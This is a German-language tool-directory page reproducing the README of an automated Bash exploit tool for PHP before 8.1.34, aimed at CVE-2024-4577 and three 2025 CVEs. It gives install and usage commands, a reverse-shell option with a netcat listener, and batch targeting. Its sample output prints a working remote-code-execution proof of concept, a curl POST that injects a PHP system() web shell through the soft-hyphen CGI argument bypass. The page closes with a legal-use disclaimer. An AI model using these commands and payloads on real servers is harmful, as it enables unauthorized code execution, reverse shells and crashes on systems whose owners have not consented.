Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
AufklärungSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlCrawlerRemote-Access-Tool
GitHubgl1tch0x1/php_8.1.x_exploit
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
PHP_8.1.x_Exploit — Automatisierte Erkennung und Ausnutzung kritischer PHP-Sicherheitslücken (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit

PHP_8.1.x_Exploit

Automatisierte Erkennung und Ausnutzung kritischer PHP-Sicherheitslücken (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Repository anzeigen
Teilen

🚀 PHP CVE Autopilot

Automatisierte Erkennung und Ausnutzung kritischer PHP-Sicherheitslücken (CVE-2024-4577-Bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh ist ein einziges, null‑konfigurations Sicherheitsbewertungswerkzeug, das automatisch verwundbare PHP-Endpunkte entdeckt und vier hochwirksame CVEs ausnutzt, die PHP-Versionen vor 8.1.34 (veröffentlicht Dezember 2024) betreffen. Es erfordert kein manuelles Erstellen von Payloads – geben Sie einfach eine URL an und das Skript erledigt den Rest, vom Crawling bis zur Remote-Code-Ausführung. Vollautomatischer Autopilot – erkennt und exploitiert automatisch ohne Benutzereingaben.

Funktionen

  • Vollautonomer Autopilot – gibt eine einzelne URL vor, crawlt, erstellt Fingerabdrücke, testet und exploitiert ohne Benutzereingriff.
  • Batch-Scanning – geben Sie eine Liste von Zielen ein und führen Sie sie parallel aus.
  • Fortschrittliches Crawling – extrahiert Links und Formulare von der Startseite für eine bessere Erkennung.
  • Betriebssystem- und PHP-Version-Fingerprinting – vermeidet Windows-spezifische Angriffe auf Linux, prüft die PHP-Version.
  • CVE-2024-4577-Bypass (Windows-CGI-Argumentinjektion)
    • Erkennt und exploitiert verwundbare PHP-CGI-Endpunkte.
    • Reverse Shell (PowerShell One‑Liner) optional.
    • Zwei Injektionsvarianten: Standard -d und Soft‑Hyphen %AD Bypass.
  • CVE-2025-14177 – Heap‑Speicherleck über getimagesize()
    • Erstellt dynamisch ein fehlerhaftes JPEG und sendet es automatisch an jeden entdeckten Upload‑Endpunkt.
    • Erkennt durchgesickerten Speicher in Antworten.
  • Tiefer lokaler Scan via RCE (wenn CVE-2024-4577 ausgenutzt wurde)
    • Lädt einen leichten PHP‑Scanner hoch, der testet auf:
      • CVE-2025-14180 – NULL‑Zeiger‑Dereferenzierung in PDO PostgreSQL.
      • CVE-2025-14178 – Integer‑Überlauf in array_merge.
  • Intelligentes Crawling – extrahiert Links und Formulare, um CGI‑Skripte und Upload‑Seiten zu entdecken.
  • Parallele Ausführung – verwendet parallel falls verfügbar, fällt ansonsten zurück.
  • Ausführliche & Debug‑Modi – sehen Sie jede HTTP‑Anfrage und Entscheidung.
  • Berichtserstellung – speichert alle Ergebnisse in einer Textdatei.
  • Bereinigt & sicher – temporäre Dateien werden beim Beenden gelöscht, Timeouts verhindern Hängenbleiben.

Voraussetzungen

Keine Root‑Rechte erforderlich – das Tool sendet nur HTTP‑Anfragen und führt optional eine Reverse Shell aus (erfordert einen Listener auf Ihrem Rechner).

Installation

root@kitploit:~
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Verwendung

Einzelnes Ziel (am häufigsten)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.example.com

Einzelnes Ziel mit Reverse Shell (CVE-2024-4577)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

Dann auf Ihrem Rechner:

root@kitploit:~
nc -lvnp 4444

Batch‑Scan mehrerer Ziele

root@kitploit:~
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

Beispiel targets.txt:

root@kitploit:~
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

Nur‑Scan‑Modus (keine Exploit‑Versuche)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

Bericht in Datei speichern

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Ausführliche / Debug‑Ausgabe

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # sehr detailreich

So funktioniert's (Phasen)

Befehlszeilenoptionen (vollständige Referenz)

CVEs im Detail

Hinweis: CVE‑2025‑14180 und CVE‑2025‑14178 können nur von innerhalb des Servers (lokale Tests) genau erkannt werden. Das Skript erreicht dies, indem es nach einem erfolgreichen CGI‑Exploit einen Scanner hochlädt.

📸 Beispielausgabe

root@kitploit:~
[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ Wichtige Warnungen & Haftungsausschluss

  • Autopilot‑Modus – Das Tool exploitiert Schwachstellen automatisch ohne Aufforderungen. Nur auf autorisierten Zielen verwenden.
  • Nur zur legalen Nutzung – Dieses Tool ist für autorisierte Sicherheitsbewertungen, Penetrationstests und Bildungszwecke vorgesehen. Die Verwendung gegen Systeme ohne Erlaubnis ist in den meisten Rechtsordnungen illegal.
  • Keine Gewährleistung – Die Software wird „WIE BESEHEN“ ohne jegliche Garantie bereitgestellt.
  • Mögliche Schäden – Exploits können Dienste zum Absturz bringen (CVE‑2025‑14180) oder Speicher beschädigen (CVE‑2025‑14178). Nicht ohne ausdrückliche Zustimmung auf Produktionssystemen ausführen.
  • Reverse Shell – Die Option --revshell öffnet einen Socket vom Ziel zu Ihrem Rechner. Stellen Sie sicher, dass Sie das Recht haben, sich zurückzuverbinden.
  • Protokollierung – Ihre Anfragen werden in den Zugriffs‑/Fehlerprotokollen des Ziels erscheinen. Verwenden Sie es verantwortungsvoll.

🛠️ Fehlerbehebung

🤝 Mitwirken

Pull‑Requests, Fehlerberichte und Feature‑Vorschläge sind willkommen. Bitte beachten Sie:

  • Halten Sie das Skript einzeldatei‑ig und reines Bash.
  • Testen Sie sowohl mit als auch ohne parallel.
  • Aktualisieren Sie diese README entsprechend.

📜 Lizenz

GNU General Public License v3.0 – siehe LICENSE-Datei.

📚 Referenzen

  • PHP 8.1.34 Release‑Ankündigung
  • CVE-2024-4577 Detail (NVD)
  • CVE-2025-14177 / 14178 / 14180 (NVD)
  • Windows Best‑Fit‑Zeichenzuordnung

Hergestellt mit 🧠 für die Sicherheitsgemeinschaft. Ethisch nutzen.

Tool herunterladen
AbhängigkeitZweckNormalerweise installiert?
bash 4.0+Skript‑InterpreterJa (Linux/macOS)
curlHTTP‑AnfragenJa
grep, sed, awkTextverarbeitungJa
mktempErstellung temporärer DateienJa
(optional) parallelSchnelleres Batch‑ScannenNein (aber empfohlen)
(optional) jqJSON‑AusgabeformatierungNein
PhaseAktion
1Fingerprinting – Betriebssystem‑ und PHP‑Version aus Headern und Sonden.
2Crawling – extrahiert href‑ und action‑Attribute von der Startseite.
3CGI‑Erkennung – probiert gängige Pfade und gecrawlte Links, die wie CGI aussehen.
4CVE‑2024‑4577‑Test – injiziert sowohl -d als auch %AD Payloads; bei Erfolg führt es Befehle aus oder sendet eine Reverse Shell.
5Upload‑Endpunkt‑Erkennung – prüft gängige Upload‑Pfade und alle Formulare, die „upload“/„image“ enthalten.
6CVE‑2025‑14177‑Test – erstellt ein fehlerhaftes JPEG, sendet es per POST an jeden Upload‑Endpunkt, erkennt Heap‑Lecks.
7Tiefer interner Scan – falls RCE erreicht wird, lädt ein Scanner‑PHP‑Skript hoch und führt es aus, um CVE‑2025‑14180 / CVE‑2025‑14178 zu testen.
8Berichterstattung – gibt eine Zusammenfassung aus und schreibt optional in eine Datei.
OptionBeschreibung
-u URLURL eines einzelnen Ziels (z. B. http://example.com/)
-l DATEIBatch‑Datei mit einer URL pro Zeile
--scan-onlyNur erkennen – nicht exploitieren (keine Reverse Shell, keine Payload‑Uploads)
-o DATEISchreibe Endbericht in DATEI
--threads NAnzahl paralleler Threads für Batch‑Scan (Standard: 5)
--timeout NHTTP‑Timeout in Sekunden (Standard: 10)
--no-colorFarbausgabe deaktivieren
--verboseDetaillierten Fortschritt anzeigen
--debugJede HTTP‑Anfrage anzeigen (kann sensible Daten offenlegen)
--revshell IP PORTVersuche Reverse Shell, wenn CVE‑2024‑4577 gefunden wird
-h, --helpHilfe anzeigen und beenden
CVESchweregradAuswirkungExploit‑VektorBehoben in
CVE‑2024‑4577 (Bypass)KritischRCEWindows‑CGI‑Argumentinjektion (Soft‑Hyphen‑Mapping)PHP 8.1.34
CVE‑2025‑14177Mittel/HochInfo‑Leck (Heap‑Speicher)Fehlerhaftes JPEG, an getimagesize() übergebenPHP 8.1.34
CVE‑2025‑14180HochDoS (NULL‑Dereferenzierung)PDO PostgreSQL mit emulierten Prepares + fehlerhaftem Parameter \x99PHP 8.1.34
CVE‑2025‑14178Hoch (8.2)DoS / mögliche Speicherkorruptionarray_merge() mit riesigen Arrays führt zu Integer‑ÜberlaufPHP 8.1.34
ProblemLösung
curl: command not foundInstallieren Sie curl
GNU parallel not foundIgnoriert – Skript funktioniert auch ohne (langsamere Batch‑Scans)
Keine CGI‑Endpunkte gefundenDas Ziel verwendet möglicherweise kein CGI, oder es befindet sich hinter einer WAF, die -d‑Flags blockiert
CVE‑2024‑4577 funktioniert, aber Reverse Shell schlägt fehlFirewall prüfen; versuchen Sie einen einfacheren Payload mit --scan-only und manuellem nc‑Listener
Bild‑Lecktest gibt immer „No leak“ zurückDer Upload‑Endpunkt verwendet möglicherweise nicht getimagesize() oder bereinigt Binärdaten
Lokaler Scanner‑Upload schlägt fehlDas Web‑Root ist möglicherweise nicht beschreibbar; das Skript versucht, in dasselbe Verzeichnis wie das CGI‑Skript zu schreiben